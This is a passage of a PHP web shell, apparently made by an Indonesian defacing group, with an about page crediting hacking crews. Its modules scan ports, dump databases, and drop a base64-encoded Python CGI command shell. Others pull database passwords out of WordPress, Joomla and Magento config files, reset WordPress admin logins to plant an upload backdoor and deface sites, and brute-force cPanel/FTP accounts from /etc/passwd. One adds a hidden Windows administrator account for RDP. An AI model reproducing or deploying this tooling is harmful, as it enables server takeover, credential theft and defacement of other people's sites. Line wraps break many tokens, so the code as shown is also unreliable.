return @substr($mytext,$posLeft,$posRight-$posLeft);
flush();
}
echo '<br><br><center>';
echo '
<br />
<div class="sc"><form method="post"><table>
<tr><th colspan="5" style="border: 2px lime dotted;">Whois Site</th></tr>
<tr><td>Site to scan </td><td>:</td><td><input type="text" name="site" size=
"50" style="color:white;" class="inputz" value="site.com" /> &nbsp <input class=

"inputzbut" type="submit" style="color:white;background-color:#000000" name="sca


n" value="Scan !" /></td></tr>
</table></form></div>';
if(isset($_POST['scan']))
{
$site = @htmlentities($_POST['site']);
if (empty($site)){die('<br /><br /> Not add IP .. !');}
$ip_port = @gethostbyname($site);
echo "
<br /><div class='sc2'>Scanning [ $site ip $ip_port ] ... </div>
<div class='tit'> <br /><br />|-------------- Port Server ------------------|
<br /></div>
<div class='ru'> <br /><br /><pre>
";
echo "".sws_port_scan($ip_port)." </pre></div> ";
flush();
echo '<div class="tit"><br /><br />|-------------- Domain Info -----------------| <br /> </div>
<div class="ru">
<pre>".sws_domain_info($site)."</pre></div>';
flush();
echo '
<div class="tit"> <br /><br />|-------------- Network Info -----------------| <br /></div>
<div class="ru">
<pre>".sws_net_info($site)."</pre> </div>';
flush();
echo '<div class="tit"> <br /><br />|-------------- subdomains Server -----------------| <br /></div>
<div class="ru">
<pre>".sws_sup_dom($site)."</pre> </div>';
flush();
echo '<div class="tit"> <br /><br />|-------------- Site Server -----------------| <br /></div>
<div class="ru">
<pre>".sws_site_ser($site)."</pre> </div>
<div class="tit"> <br /><br />|-------------- END ------------------| <br /><
/div>';
flush();
}
echo '</center>';
} elseif($_GET['do'] == 'dbdump') {
echo $head.'<p align="center">';
echo '
<form action method=post>
<table width=371 class=tabnet >
<tr><th colspan="2">Database Dump</th></tr>
<tr>
<td>Server </td>
<td><input class="inputz" type=text name=server size=52></td></tr><tr>
<td>Username</td>
<td><input class="inputz" type=text name=username size=52></td></tr><tr>
<td>Password</td>
<td><input class="inputz" type=text name=password size=52></td></tr><tr>
<td>DataBase Name</td>
<td><input class="inputz" type=text name=dbname size=52></td></tr>
<tr>
<td>DB Type </td>
<td><form method=post action="'.$me.'">
<select class="inputz" name=method>

<option value="gzip">Gzip</option>
<option value="sql">Sql</option>
</select>
<input class="inputzbut" type=submit value=" Dump! " ></td></tr>
</form></center></table>';
if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
$date = date("Y-m-d");
$dbserver = $_POST['server'];
$dbuser = $_POST['username'];
$dbpass = $_POST['password'];
$dbname = $_POST['dbname'];
$file = "Dump-$dbname-$date";
$method = $_POST['method'];
if ($method=='sql'){
$file="Dump-$dbname-$date.sql";
$fp=fopen($file,"w");
}else{
$file="Dump-$dbname-$date.sql.gz";
$fp = gzopen($file,"w");
}
function write($data) {
global $fp;
if ($_POST['method']=='ssql'){
fwrite($fp,$data);
}else{
gzwrite($fp, $data);
}}
mysql_connect ($dbserver, $dbuser, $dbpass);
mysql_select_db($dbname);
$tables = mysql_query ("SHOW TABLES");
while ($i = mysql_fetch_array($tables)) {
$i = $i['Tables_in_'.$dbname];
$create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
write($create['Create Table'].";nn");
$sql = mysql_query ("SELECT * FROM ".$i);
if (mysql_num_rows($sql)) {
while ($row = mysql_fetch_row($sql)) {
foreach ($row as $j => $k) {
$row[$j] = "'".mysql_escape_string($k)."'";
}
write("INSERT INTO $i VALUES(".implode(",", $row).");n");
}
}
}
if ($method=='ssql'){
fclose ($fp);
}else{
gzclose($fp);}
header("Content-Disposition: attachment; filename=" . $file);
header("Content-Type: application/download");
header("Content-Length: " . filesize($file));
flush();
$fp = fopen($file, "r");
while (!feof($fp))
{
echo fread($fp, 65536);
flush();
}
fclose($fp);

}
} elseif($_GET['do'] == 'domain') {
echo '<br><br><center><h1>+--=[ local domain viewer ]=--+</h1></center><br><br><
div class=content>';
$file = @implode(@file("/etc/named.conf"));
if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
preg_match_all("#named/(.*?).db#",$file ,$r);
$domains = array_unique($r[1]);
//check();
//if(isset($_GET['ShowAll']))
{
echo "<table align=center border=1 width=59% cellpadding=5>
<tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr
>
<tr><td>Domain</td><td>User</td></tr>";
foreach($domains as $domain){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
}
echo "</table>";
}
echo '</div>';
} elseif($_GET['do'] == 'pyhton') {
mkdir('python', 0755);
chdir('python');
$kokdosya = ".htaccess";
$dosya_adi = "$kokdosya";
$dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305
;!");
$metin = "AddHandler cgi-script .izo";
fwrite ( $dosya , $metin ) ;
fclose ($dosya);
$pythonp = 'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwu
cHkKIyBB
IHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD
b3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg
cmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv
ciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg
Y29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg
Zm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv
YXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g
ZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5
OgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y
dCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz
dHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy
b20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs
aW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt
c2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw
NCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg
PSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F
VEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl
cwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi
IlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g

aXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs
dWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu
Zy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g
d2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg
aXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg
ICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk
XSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt
W2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv
cm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg
PSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y
IGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg
ICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z
aGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+
CjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48
ST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl
cnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs
ICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg
Q29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr
IHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1
dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5
ZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n
IFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj
cmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6
IHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg
ICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs
YW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt
KFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt
aGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+
PEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS
PicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg
ICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg
ICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv
dXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy
aW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv
biwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv
bW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ
TygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh
bHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg
ICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD
SEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0
ZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw
cm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi';
$file = fopen("python.izo" ,"w+");
$write = fwrite ($file ,base64_decode($pythonp));
fclose($file);
chmod("python.izo",0755);
echo " <iframe src=python/python.izo width=96% height=76% frameborder=0></ifr
ame>;
</div>";
} elseif($_GET['do'] == 'auto_dwp') {
if($_POST['auto_deface_wp']) {
function anucurl($sites) {
$ch = curl_init($sites);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Wind
ows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");

curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);


curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function lohgin($cek, $web, $userr, $pass, $wp_submit) {
$post = array(
"log" => "$userr",
"pwd" => "$pass",
"rememberme" => "forever",
"wp-submit" => "$wp_submit",
"redirect_to" => "$web",
"testcookie" => "1",
);
$ch = curl_init($cek);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5
.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt
');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.tx
t');
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
$scan = $_POST['link_config'];
$link_config = scandir($scan);
$script = htmlspecialchars($_POST['script']);
$user = "global";
$pass = "network";
$passx = md5($pass);
foreach($link_config as $dir_config) {
if(!is_file("$scan/$dir_config")) continue;
$config = file_get_contents("$scan/$dir_config");
if(preg_match("/WordPress/", $config)) {
$dbhost = ambilkata($config,"DB_HOST', '","'");
$dbuser = ambilkata($config,"DB_USER', '","'");
$dbpass = ambilkata($config,"DB_PASSWORD', '","'
");
$dbname = ambilkata($config,"DB_NAME', '","'");
$dbprefix = ambilkata($config,"table_prefix = '
","'");
$prefix = $dbprefix."users";
$option = $dbprefix."options";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY
id ASC");

$result = mysql_fetch_array($q);
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option ORDER B
Y option_id ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
if($target == '') {
echo "[-] <font color=red>error, gabisa
ambil nama domain nya</font><br>";
} else {
echo "[+] $target <br>";
}
$update = mysql_query("UPDATE $prefix SET user_l
ogin='$user',user_pass='$passx' WHERE ID='$id'");
if(!$conn OR !$db OR !$update) {
echo "[-] MySQL Error: <font color=red>"
.mysql_error()."</font><br><br>";
mysql_close($conn);
} else {
$site = "$target/wp-login.php";
$site2 = "$target/wp-admin/theme-install
.php?upload";
$b1 = anucurl($site2);
$wp_sub = ambilkata($b1, "id=\"wp-submit
\" class=\"button button-primary button-large\" value=\"","\" />");
$b = lohgin($site, $site2, $user, $pass,
$wp_sub);
$anu2 = ambilkata($b,"name=\"_wpnonce\"
value=\"","\" />");
$upload3 = base64_decode("Z2FudGVuZw0KPD
9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgIC
AgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbm
soIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaW
xlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
$www = "m.php";
$fp5 = fopen($www,"w");
fputs($fp5,$upload3);
$post2 = array(
"_wpnonce" => "$anu2",
"_wp_http_referer" => "/
wp-admin/theme-install.php?upload",
"themezip" => "@$www",
"install-theme-submit" =
> "Install Now",
);
$ch = curl_init("$target/wp-admin/update
.php?action=upload-theme");
curl_setopt($ch, CURLOPT_RETUR
NTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLO
WLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_V
ERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_V
ERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POST,
1);
curl_setopt($ch, CURLOPT_POSTF
IELDS, $post2);
curl_setopt($ch, CURLOPT_COOKI

EJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKI
EFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESES
SION, true);
$data3 = curl_exec($ch);
curl_close($ch);
$y = date("Y");
$m = date("m");
$namafile = "id.php";
$fpi = fopen($namafile,"w");
fputs($fpi,$script);
$ch6 = curl_init("$target/wp-content/upl
oads/$y/$m/$www");
curl_setopt($ch6, CURLOPT_POS
T, true);
curl_setopt($ch6, CURLOPT_POS
TFIELDS, array('file3'=>"@$namafile"));
curl_setopt($ch6, CURLOPT_RET
URNTRANSFER, 1);
curl_setopt($ch6, CURLOPT_COO
KIEFILE, "cookie.txt");
curl_setopt($ch6, CURLOPT_COOKIEJAR,'
cookie.txt');
curl_setopt($ch6, CURLOPT_COOKIESESSI
ON, true);
$postResult = curl_exec($ch6);
curl_close($ch6);
$as = "$target/k.php";
$bs = anucurl($as);
if(preg_match("#$script#is", $bs)) {
echo "[+] <font color='lime'>berhasil mepes...</font><br
>";
echo "[+] <a href='$as' target='_blank'>$as</a><br><br>"
;
} else {
echo "[-] <font color='red'>gagal mepes...</font><br>";
echo "[!!] coba aja manual: <br>";
echo "[+] <a href='$target/wp-login.php' target='_blank'
>$target/wp-login.php</a><br>";
echo "[+] username: <font color=lime>$user</font><br>";
echo "[+] password: <font color=lime>$pass</font><br><br
>";
}
mysql_close($conn);
}
}
}
} else {
echo "<center><h1>WordPress Auto Deface</h1>
<form method='post'>
<input type='text' name='link_config' size='50' height='10' valu
e='$dir'><br>
<input type='text' name='script' height='10' size='50' placehold
er='Hacked by Global Network' required><br>
<input type='submit' style='width: 450px;' name='auto_deface_wp'
value='Hajar!!'>
</form>
</center>";
}

} elseif($_GET['do'] == 'cpftp_auto') {
if($_POST['crack']) {
$usercp = explode("\r\n", $_POST['user_cp']);
$passcp = explode("\r\n", $_POST['pass_cp']);
$i = 0;
foreach($usercp as $ucp) {
foreach($passcp as $pcp) {
if(@mysql_connect('localhost', $ucp, $pcp)) {
if($_SESSION[$ucp] && $_SESSION[$pcp]) {
} else {
$_SESSION[$ucp] = "1";
$_SESSION[$pcp] = "1";
if($ucp == '' || $pcp == '') {
//
} else {
echo "[+] username (<fon
t color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
$ftp_conn = ftp_connect(
$ip);
$ftp_login = ftp_login($
ftp_conn, $ucp, $pcp);
if((!$ftp_login) || (!$f
tp_conn)) {
echo "[+] <font
color=red>Login Gagal</font><br><br>";
} else {
echo "[+] <font
color=lime>Login Sukses</font><br>";
$fi = htmlspecia
lchars($_POST['file_deface']);
$deface = ftp_pu
t($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
if($deface) {
$i++;
echo "[+
] <font color=lime>Deface Sukses</font><br>";
if(funct
ion_exists('posix_getpwuid')) {
$domain_cp = file_get_contents("/etc/named.conf");
if($domain_cp == '') {
echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
} else {
preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
foreach($domains_cp[1] as $dj) {
$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_cp_url = $user_cp_url['name'];
if($user_cp_url == $ucp) {
echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
break;

}
}
}
} else {
echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
}
} else {
echo "[] <font color=red>Deface Gagal</font><br><br>";
}
}
//echo "username (<font
color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
}
}
}
}
}
if($i == 0) {
} else {
echo "<br>sukses deface ".$i." Cpanel by <font color=lim
e>Global Network.</font>";
}
} else {
echo "<center>
<form method='post'>
Filename: <br>
<input type='text' name='file_deface' placeholder='index.php' va
lue='index.php' style='width: 450px;'><br>
Deface Page: <br>
<input type='text' name='deface' placeholder='http://www.web-yan
g-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
USER: <br>
<textarea style='width: 450px; height: 150px;' name='user_cp'>";
$_usercp = fopen("/etc/passwd","r");
while($getu = fgets($_usercp)) {
if($getu == '' || !$_usercp) {
echo "<font color=red>Can't read /etc/passwd</fo
nt>";
} else {
preg_match_all("/(.*?):x:/", $getu, $u);
foreach($u[1] as $user_cp) {
if(is_dir("/home/$user_cp/public
_html")) {
echo "$user_cp\n";
}
}
}
}
echo "</textarea><br>
PASS: <br>
<textarea style='width: 450px; height: 200px;' name='pass_cp'>";
function cp_pass($dir) {
$pass = "";
$dira = scandir($dir);
foreach($dira as $dirb) {

if(!is_file("$dir/$dirb")) continue;
$ambil = file_get_contents("$dir/$dirb");
if(preg_match("/WordPress/", $ambil)) {
$pass .= ambilkata($ambil,"DB_PASSWORD',
'","'")."\n";
} elseif(preg_match("/JConfig|joomla/", $ambil))
{
$pass .= ambilkata($ambil,"password = '"
,"'")."\n";
} elseif(preg_match("/Magento|Mage_Core/", $ambi
l)) {
$pass .= ambilkata($ambil,"<password><![
CDATA[","]]></password>")."\n";
} elseif(preg_match("/panggil fungsi validasi xs
s dan injection/", $ambil)) {
$pass .= ambilkata($ambil,'password = "'
,'"')."\n";
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|D
IR_CONFIG|DIR_SYSTEM/", $ambil)) {
$pass .= ambilkata($ambil,"'DB_PASSWORD'
, '","'")."\n";
} elseif(preg_match("/client/", $ambil)) {
preg_match("/password=(.*)/", $ambil, $p
ass1);
if(preg_match('/"/', $pass1[1])) {
$pass1[1] = str_replace('"', "",
$pass1[1]);
$pass .= $pass1[1]."\n";
}
} elseif(preg_match("/cc_encryption_hash/", $amb
il)) {
$pass .= ambilkata($ambil,"db_password =
'","'")."\n";
}
}
echo $pass;
}
$cp_pass = cp_pass($dir);
echo $cp_pass;
echo "</textarea><br>
<input type='submit' name='crack' style='width: 450px;' value='H
ajar'>
</form>
<span>NB: CPanel Crack ini sudah auto get password ( pake db pas
sword ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home
/user/public_html/nama_folder_config )</span><br></center>";
}
} elseif($_GET['do'] == 'about') {
?>
<embed
src="http://www.youtube.com/v/j_y3i3EHR7E&amp;autoplay=1&amp;loop=1&amp;playlist
=besNDPvEwQw"
type="application/x-shockwave-flash" wmode="transparent" height="1"
width="1"></embed>
<center><br><br><img src='http://i.imgur.com/3m7leCw.jpg'>
<br>Belajar mengalah sampai tak satupun yang dapat mengalahkan.
<br> Keep Play With you game and keep Fun :D
<br>tidak ada orang bodoh atau orang jago yang ada hanya kata males.
<br>Jiwa Seorang defacer tetaplah sama :D
<br><font color="white"> 12-20-2016 - Tangerang</font>

<br><br><font size="5" color="#00ff00">Tanks to:</font></center><center>


<marquee direction="up" scrollamount="2" bgcolor="" width="250" height="40"><cen
ter>
<p><b><font size="3" color="#00ff00">=[ Teman-Temanku ]=<br><br>Gabby<br>Antonio
HSH<br>R10<br>w4r0x<br>edelle007<br>Brian kamikaze<br>Clover Lepex<br>
Uyap<br>Zinbad<br>FH04ZA<br>Sani marpic<br>rintoar<br>
Madan Cyber<br>Cah Bagus<br>RPG<br>Vallent<br>P4njie_a.k.a<br>Dwi Syntia<br> rul Ri
nggo's<br>Ti'ar Variabel<br>Imei7<br>Hmei7<br>De Vinclous<br>Blankon33<br>Doza C
racker<br>Ying Cracker<br>Iranian Hacker<br>Danger Hacker<br>Admin07<br>Zhou you
<br>Ksatria.us<br>Cyber Inj3cti0n<br>K2ll33d<br>Sultan Haikal<br>Syntax_Error<br
>Aqis<br>Black Shadow<br>crack999<br>Fnatic Crew<br>
Coretan Rizal<br>Malaikat Maut<br>Dan teman-teman ku semua<br><br>=[ grup hackin
g ]=<br><br>Black Newbie Team<br>3xpire Cyber Army<br>Hack Forum<br>
Indonesia Fighter Cyber<br>Biang Kerox Team<br>Anonymous<br>Gaza Hacker<br>Alban
ian Hacker<br>Devilz c0de<br>Muslims Cyber Shellz<br>X-Code<br>IndoXploit<br>Ind
onesian Security<br>Indonesia Black Cyber<br>
B-Compi<br>Jasakom<br>Mojopahit Fighter Cyber<br>Lappis<br>Mojopahit Cyber Dark<
br>Crack Hack Forum<br>dan semua grup hacking<br>yang<br>saya naungi dan singgah
i<br><br><br>By<br>Cyber173 a.k.a X'1n73ct<br><br><br>
</font></b></p>
</center>
</marquee>
<?php
} elseif($_GET['do'] == 'krdp') {
if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
if($_POST['create']) {
$user = htmlspecialchars($_POST['user']);
$pass = htmlspecialchars($_POST['pass']);
if(preg_match("/$user/", exe("net user"))) {
echo "[INFO] -> <font color=blue>user <font colo
r=lime>$user</font> sudah ada</font>";
} else {
$add_user = exe("net user $user $pass /add");
$add_groups1 = exe("net localgroup Administrators $user
/add");
$add_groups2 = exe("net localgroup Administrator $user /
add");
$add_groups3 = exe("net localgroup Administrateur $user
/add");
echo "[ RDP ACCOUNT INFO ]<br>
------------------------------<br>
IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST
'])."</font><br>
Username: <font color=lime>$user</font><br>
Password: <font color=lime>$pass</font><br>
------------------------------<br><br>
[ STATUS ]<br>
------------------------------<br>
";
if($add_user) {
echo "[add user] -> <font color='lime'>Berhasil<
/font><br>";
} else {
echo "[add user] -> <font color='red'>Gagal</fon
t><br>";
}
if($add_groups1) {
echo "[add localgroup Administrators] -> <font c
olor='lime'>Berhasil</font><br>";
} elseif($add_groups2) {

echo "[add localgroup Administrator] -> <font color=


'lime'>Berhasil</font><br>";
} elseif($add_groups3) {
echo "[add localgroup Administrateur] -> <font color
='lime'>Berhasil</font><br>";
} else {
echo "[add localgroup] -> <font color='red'>Gaga
l</font><br>";
}
echo "------------------------------<br>";
}
} elseif($_POST['s_opsi']) {
$user = htmlspecialchars($_POST['r_user']);
if($_POST['opsi'] == '1') {
$cek = exe("net user $user");
echo "Checking username <font color=lime>$user</
font> ....... ";
if(preg_match("/$user/", $cek)) {
echo "[ <font color=lime>Sudah ada</font
> ]<br>
------------------------------<br><br>
<pre>$cek</pre>";
} else {
echo "[ <font color=red>belum ada</font>
]";
}
} elseif($_POST['opsi'] == '2') {
$cek = exe("net user $user global");
